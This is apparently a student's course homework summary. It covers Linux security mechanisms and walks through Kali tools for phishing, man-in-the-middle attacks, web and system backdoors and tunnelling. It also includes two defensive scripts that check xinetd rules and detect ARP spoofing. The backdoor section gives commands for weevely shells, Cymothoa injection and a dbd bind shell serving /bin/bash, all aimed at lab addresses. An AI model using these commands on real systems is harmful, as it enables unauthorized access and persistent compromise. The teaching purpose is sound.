2017-2018-2 20179215 "Network Attack and Defense Practice" Week 8 Homework

"Network Attack and Defense Practice" Eighth Week Learning Summary

1. Summary of Textbook Chapter 8

Introduction to the Linux Operating System

  1. Linux system features:
  • UNIX compatible: compatible APIs, management commands and tools
  • Open source
  • Supports many hardware platforms and multiple CPUs
  • A large number of applications and development tools are available on the Linux platform
  • Many distributions: RedHat (RHEL, Fedora, CentOS, …), Ubuntu, Debian, …

2. Linux operating system:

  • Not a microkernel system, but it has some microkernel features
  • Intel (i386) version: protected mode with privilege levels

    • Kernel mode (ring 0) and user mode (ring 3)
    • Interrupts and system calls switch between the two privilege levels
  • Multi-user, multi-tasking, time-sharing system

    • Multi-user system: a computer that can concurrently and independently execute several applications (tasks) belonging to multiple users.

3. Linux processes

  • Preemptive multitasking: many processes run concurrently, and the kernel is responsible for scheduling their use of hardware resources
  • PCB (process control block): resident in memory
  • The process is the basic scheduling unit
  • Processes are dynamic; each process has its own process control block
  • There is no dedicated scheduler process; the schedule() function in the kernel performs the scheduling task

4. Linux system calls

  • Programming interface: POSIX compliant, a collection of C language functions
  • Kernel function names have the form sys_xxx
  • For example, the fork system call corresponds to the kernel function sys_fork()
  • The mechanism is similar to INT 21H in DOS
  • Kernels before Linux 2.6 used int 80h
  • The Linux 2.6 kernel supports the sysenter mechanism
  • System call numbers and the system call table
  • All system calls share a single entry point, system_call
  • Exit path: ret_from_sys_call

5. Linux memory management

  • On i386 machines, each process has its own 4 GB virtual address space
  • 32-bit linear addresses, using the hardware paging mechanism
  • The kernel's code and data segments are mapped to the space above 3 GB
  • User-mode code can only use the 0-3 GB range of the virtual address space
  • Each process uses two sets of segment descriptors, one for accessing memory in kernel mode and one for user mode
  • User-mode code cannot access the address space above 3 GB; kernel space can only be reached through system calls or interrupts
  • Linux manages virtual memory with the vma (virtual memory area) mechanism
  • Paging: a page fault interrupt triggers swapping the page in

6. Linux file systems

  • Linux supports many file systems, including ext, ext2, hpfs, vfat, ntfs, …
  • Through the virtual file system (VFS), Linux can support different types of file systems
  • Specific hardware devices are accessed through device files in the virtual file system
  • File system type management
  • A file system type is registered either:
    • statically, when the kernel is compiled, or
    • when the file system module is loaded

7. The Hierarchy of Networking in Linux

Security Architecture and Mechanisms of Linux

1. Core of the Linux security mechanism

  • AAA mechanism: Authentication, Authorization and Auditing
  • Authentication: user management and user authentication
  • Authorization (access control): authorized access and access control, i.e. file system security controls
  • Accountability: behavioral auditing, i.e. the system logging mechanism

2. Linux user authentication

  • Local user login authentication: login, using the crypt() function
  • Network service login authentication: telnet/rsh/ssh/…
    ssh supports non-interactive remote authentication with public keys
  • User authentication for non-shell programs:
    • Apache: MD5 hashed passwords (created by htpasswd)
    • Samba: smbpasswd, LANMAN or NTLM hashed passwords
    • MySQL: stored in the user system table, PASSWORD() function, can use an MD5 or SHA1 hash
  • Linux PAM: user authentication middleware

3. PAM (Pluggable Authentication Modules)

  • A pluggable authentication mechanism
  • For a service, the authentication-related actions are listed in /etc/pam.conf, or in a configuration file named after the service under /etc/pam.d/
  • Each line contains a module type, a control flag and a module:
    service module-type control-flag module [args]

4. Linux file system security

  • Permission management is inflexible
  • Permissions can only be assigned to the owner, the owner's group and other users, with no finer granularity
  • POSIX ACLs for Linux package
    • A kernel patch that allows permissions to be managed with ACLs
    • The kernel must be recompiled; download the patch from http://acl.bestbits.at
    • Two commands: setfacl, getfacl
  • Truly deleting a file
    • the wipe tool

5. Rootkits in the kernel

  • Through the LKM mechanism, a Trojan module can be inserted into the system kernel
  • A typical rootkit for Linux 2.2.x: knark
  • Loaded into the kernel with insmod knark.o
  • Once the knark backdoor is loaded it:
    • can change the output of netstat
    • can change the UID and GID of running processes
    • can grant root access without SUID
    • ……
  • Other rootkits include adore and adore-ng
  • Countermeasures against kernel rootkits:
    • Detect each rootkit by its characteristics and try to remove it
    • For prevention, install a kernel intrusion detection system such as LIDS

6. xinetd configuration

7. /etc/services configuration file

8. Implementing network access control with xinetd

  • Deny access by default
    • In /etc/xinetd.conf set the no_access attribute: no_access = 0.0.0.0
    • only_from =
  • Fine-grained network access control
    • In the defaults section of xinetd.conf or in the individual service configuration files:
    • only_from = IP ranges and domain name ranges allowed to access
    • no_access = IP ranges and domain names denied access
  • Linux firewall
    • Kernel: netfilter
    • Application layer (user-space tools): ipfwadm -> ipchains -> iptables
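As an added example (not from the textbook or from xinetd itself), the following script models how xinetd combines only_from and no_access for a client address, so that a configuration like the one above (default deny in the defaults section, a per-service only_from) can be checked before it is deployed. It assumes the rule documented in xinetd.conf(5) that the most specific matching entry wins and that an equally specific match in both lists denies access; only IPv4 dotted and CIDR entries are handled.

```python
import ipaddress

# Added example, not xinetd's own code: models how xinetd combines the
# only_from and no_access attributes for one client address.
# Assumed rule (xinetd.conf(5)): the most specific matching entry wins;
# if both lists match with equal specificity, access is denied.

def parse_entry(entry):
    """xinetd IPv4 entry -> ip_network. Accepts a.b.c.d/n and the dotted
    form where right-most zero octets are wildcards (0.0.0.0 -> /0,
    192.168.14.0 -> /24). Host names and netmask forms are not handled."""
    if "/" in entry:
        return ipaddress.ip_network(entry, strict=False)
    octets = entry.split(".")
    while octets and octets[-1] == "0":
        octets.pop()
    return ipaddress.ip_network(f"{entry}/{8 * len(octets)}", strict=False)

def best_match(client, entries):
    """Longest prefix length among entries containing client, else None."""
    addr = ipaddress.ip_address(client)
    hits = [net.prefixlen for net in map(parse_entry, entries) if addr in net]
    return max(hits) if hits else None

def xinetd_allows(client, only_from=None, no_access=None):
    """True if xinetd would accept client; None = attribute not set."""
    if only_from is None and no_access is None:
        return True  # neither attribute set: open to everyone
    allow = best_match(client, only_from) if only_from is not None else None
    deny = best_match(client, no_access) if no_access is not None else None
    if only_from is None:
        return deny is None
    if no_access is None:
        return allow is not None
    if allow is None:
        return False  # not in the allow list at all
    if deny is None:
        return True
    return allow > deny  # equal specificity falls through to denial

if __name__ == "__main__":
    # Constructed config mirroring the page: defaults deny all (0.0.0.0),
    # then a per-service only_from re-opens one segment.
    for ip in ("192.168.14.129", "10.0.0.5"):
        print(ip, xinetd_allows(ip, ["192.168.14.0"], ["0.0.0.0"]))
```

Note that a no_access entry more specific than the only_from range (a single host inside the allowed /24, for instance) still wins, which is how a single misbehaving host can be excluded without rewriting the allow list.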

9. Linux kernel firewall (netfilter)

  • The framework defines 5 hook positions
  • Multiple modules can be attached to each hook
  • Filtering positions: LOCAL_IN (INPUT), FORWARD, LOCAL_OUT (OUTPUT)
  • Offers a variety of functions:
    • packet filtering firewall
    • address translation (NAT)
    • stateful inspection (connection tracking)
    • ……

Remote attacks on Linux systems

  • Password guessing
  • Attacking Linux network services
    • Data-driven attacks on network service daemons:
    • buffer overflows
    • format string bugs
    • input validation flaws
    • integer overflows
  • Default or harmful configurations
  • Attacking Linux

2. Kali video learning

31. KaliSecurity - Using SET for exploitation

Learn to use the SET tool among the exploitation tools in Kali.

The Social Engineering Toolkit (SET) is an open-source, Python-driven social engineering penetration-testing tool that provides a very rich library of attack vectors. It is usually used together with Metasploit.

1. Open the terminal:

2. Enter 1 and press Enter to open the social engineering attacks menu:

There are 11 modules in total, namely:

3. Enter 1 to open the spear-phishing attack:

The main purpose of this attack vector is to send phishing emails carrying malware; the payload can be chosen for different vulnerabilities (option 2):

4. Return to the main menu and select 2 to enter the website attack framework:

5. Select 3 to enter the infectious media attack:

It executes the exploit through Autorun.inf to get a shell back, and it can also be combined with a Metasploit backdoor.

6. Create a payload and listener:

7. Select 5, the mass mailer attack, which supports importing a list and sending mail to everyone in it

8. Arduino-based attack

9. SMS spoofing attack

10. Wireless access point attack: creates a virtual wireless AP through which all traffic from connecting devices can be captured.

11. QR code attack: a dangerous URL is embedded so that whoever scans the QR code automatically visits that page.

12. PowerShell attack: PowerShell attack modules for Vista and above

13. Fast-Track attack modules

32. KaliSecurity - Sniffing, spoofing and man-in-the-middle attacks

Learn to use the sniffing and spoofing tools in Kali and complete the man-in-the-middle attack experiment. The methods covered are ARP spoofing, DNS spoofing and sniffing, and session hijacking.

1. Enable port forwarding in the Kali settings

2. Set up sslstrip

3. Prepare ettercap

4. Using ettercap

Open the graphical interface:

Select the default eth0 as the sniffing network card:

Open ettercap, choose Sniff -> Unified sniffing -> select the network card -> Hosts: scan for hosts first, then open the host list after the scan finishes

5. Introduction to the Dsniff suite

6. Session Hijacking

7. Image interception

8. DNS spoofing

9. URL monitoring

10. Download software monitoring
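From the defender's side, the ARP spoofing step of the man-in-the-middle experiment above leaves a recognisable trace: an IP whose MAC address suddenly changes, and one MAC that answers for both the gateway and a victim. The detector below is an added example, not part of the course material or of ettercap/dsniff; it runs over constructed (sender IP, sender MAC) pairs as they would be read from ARP "is-at" replies.

```python
from collections import defaultdict

# Added example, not from the page or from ettercap/dsniff: a detector
# for the ARP-spoofing step of the man-in-the-middle setup described above.
# It consumes (sender_ip, sender_mac) pairs taken from ARP "is-at" replies
# and flags (a) an IP whose MAC changes and (b) one MAC answering for
# several IPs, the pattern left by a host impersonating gateway and victim.
# Caveat: DHCP reassignment and routers with several addresses trigger the
# same alerts, so a real deployment needs a whitelist of known pairs.

def detect_arp_spoofing(replies, gateway_ip=None):
    """Return alert strings for suspicious replies, in order of detection."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            tag = "GATEWAY " if ip == gateway_ip else ""
            alerts.append(f"{tag}{ip} changed from {prev} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                ips = ", ".join(sorted(mac_to_ips[mac]))
                alerts.append(f"{mac} claims multiple IPs: {ips}")
    return alerts

# Constructed sample: a genuine gateway and victim, then an attacker MAC
# answering for both addresses (as ettercap's ARP poisoning does).
SAMPLE_REPLIES = [
    ("192.168.14.1", "00:50:56:aa:bb:01"),
    ("192.168.14.129", "00:0c:29:11:22:33"),
    ("192.168.14.1", "00:0c:29:de:ad:01"),
    ("192.168.14.129", "00:0c:29:de:ad:01"),
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_REPLIES, gateway_ip="192.168.14.1"):
        print("ALERT:", alert)
```

On a real segment the same logic can be fed from arpwatch or a packet capture; static ARP entries for the gateway on critical hosts remove the attack surface entirely.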

33. KaliSecurity - Privilege maintenance: backdoors

Learn to use the backdoor tools in Kali's privilege maintenance category. Privilege maintenance has three subclasses: the Tunnel toolset, web backdoors and system backdoors. System backdoors and web backdoors are collectively called backdoors: malicious programs left behind to make it easy to re-enter the system after a penetration test.

1. weevely

Generate a PHP backdoor with weevely generate test ~/1.php (test is the password); ~/1.php is created locally. View the generated backdoor:

The backdoor is uploaded to the web and connected using weevely:

(1) Copy the backdoor

(2) View the target machine ip

(3) ssh connection

Unable to connect to target machine with ssh

(4) nano 1.php and copy the content of the generated file into it

(5) Connect with the command weevely http://192.168.14.129/1.php test

2. WeBaCoo

Generate the backdoor

View the generated backdoor

nano 2.php and copy the content of the generated file into it

After uploading it to the website, connect using webacoo: webacoo -t -u http://192.168.199.149/2.php

3. Cymothoa system backdoor

Enumerate the pids of /bin/bash processes

cymothoa -p 10500 -s 0 -y 2333 (inject with port 2333); if successful, connecting to port 2333 returns a shell

4. dbd, sbd: enhanced versions of nc

Listening side: dbd -l -p 2333 -e /bin/bash -k password

Client side: dbd 127.0.0.1 2333 -k password

5. U3-Pwn: a tool used together with Metasploit payloads; from its menu it can target removable media devices such as optical drive images and USB drives.

6. Intersect

1. List available modules

2. Create a backdoor script

3. Automatically add components and spawn a shell

4. Create a backdoor

5. Execute the backdoor

(1) Enter ./1.py -b for bind mode

(2) Use the nc command to connect

(3) If the execution is successful, return a shell

34. KaliSecurity - Privilege maintenance: tunnels

Learn to use the tunnel tools in Kali's privilege maintenance category. The Tunnel toolset includes a series of tools for establishing communication tunnels and proxies.

1. CryptCat: similar to dbd/sbd.

2. DNS2TCP:

3. Iodine: similar to DNS2TCP

4. Miredo: a network tool mainly used for Teredo IPv6 tunneling on BSD and Linux. It lets network connections without IPv6 support reach IPv6. IPv6 and TUN tunnel support are required in the kernel.

5. Proxychains:

A tool often used in internal network penetration testing. For example, we use Meterpreter to open a Socks4a proxy service; after editing the /etc/proxychains.conf configuration file and adding the proxy, other tools such as sqlmap and nmap can use the proxy to scan the internal network directly.

6. Proxytunnel

7. Ptunnel: establishes tunnel communication over ICMP packets

8. Pwnat: communicates over UDP from inside an internal network

9. sslh

10. stunnel

11. udptunnel

35. KaliSecurity - Reverse engineering tools

Learn about the reverse engineering tools in Kali

1. Debuggers

EDB (Evan's Debugger) is a binary debugging tool built on Qt4, intended as a counterpart to OllyDbg. Its functionality can be extended through a plug-in system. Currently only Linux is supported.

2. OllyDbg

3. jad: Java decompiler

4. Playback2

5. Recstudio2

6. Apktool

9. Flasm

10. Javasnoop

3. Experiment: building and testing the network attack and defense environment

A basic network attack and defense lab environment consists mainly of the following parts: target machines, attacker machines, an attack monitoring, analysis and defense platform, and the network connection.

1. Network connection

There are three types of network connection for operating systems running in VMware virtual machine software:

  • Bridged mode (Bridge): VMware presents a virtual network card to the guest system, and the host system acts as a bridge for the guest. The guest appears to have its own network card directly connected to the network, that is, the guest is directly visible to the outside world.

  • Network address translation (NAT): the guest cannot connect to the network by itself; every packet the guest sends or receives passes through the host, which performs address translation. The guest is therefore invisible to the outside world.

  • Host-only mode: the host system simulates a virtual switch, and all guests reach the network through this switch. If the host uses a public IP to connect to the Internet, the guests can only use private IPs. But if another guest is set up to reach the Internet by bridging (that guest then acts as the bridge), these guests can be given public IPs and reach the Internet directly through that virtual bridge.

In this environment the network connection is set to bridged mode. In this mode, note that the attacker machine and the target machine must be on the same network segment.

2. Environment construction

Attacker machine: Windows XP Attacker (Windows)

Target machines: Metasploitable (Linux), Win2kServer_SP0_target

Install the attacker machine:

(1) Unzip the rar image of WinXPattacker to a directory

(2) File --> Open, select your decompression directory and pick the corresponding vmx file

(3) Configure the hardware of the attacker virtual machine

View the attacker machine IP:

Install the target machine:

(1) Unzip the rar image of Win2kServer_SP0_target to a directory

(2) File --> Open, select your decompression directory and pick the corresponding vmx file

(3) Configure the hardware of the target virtual machine

View the target IP:
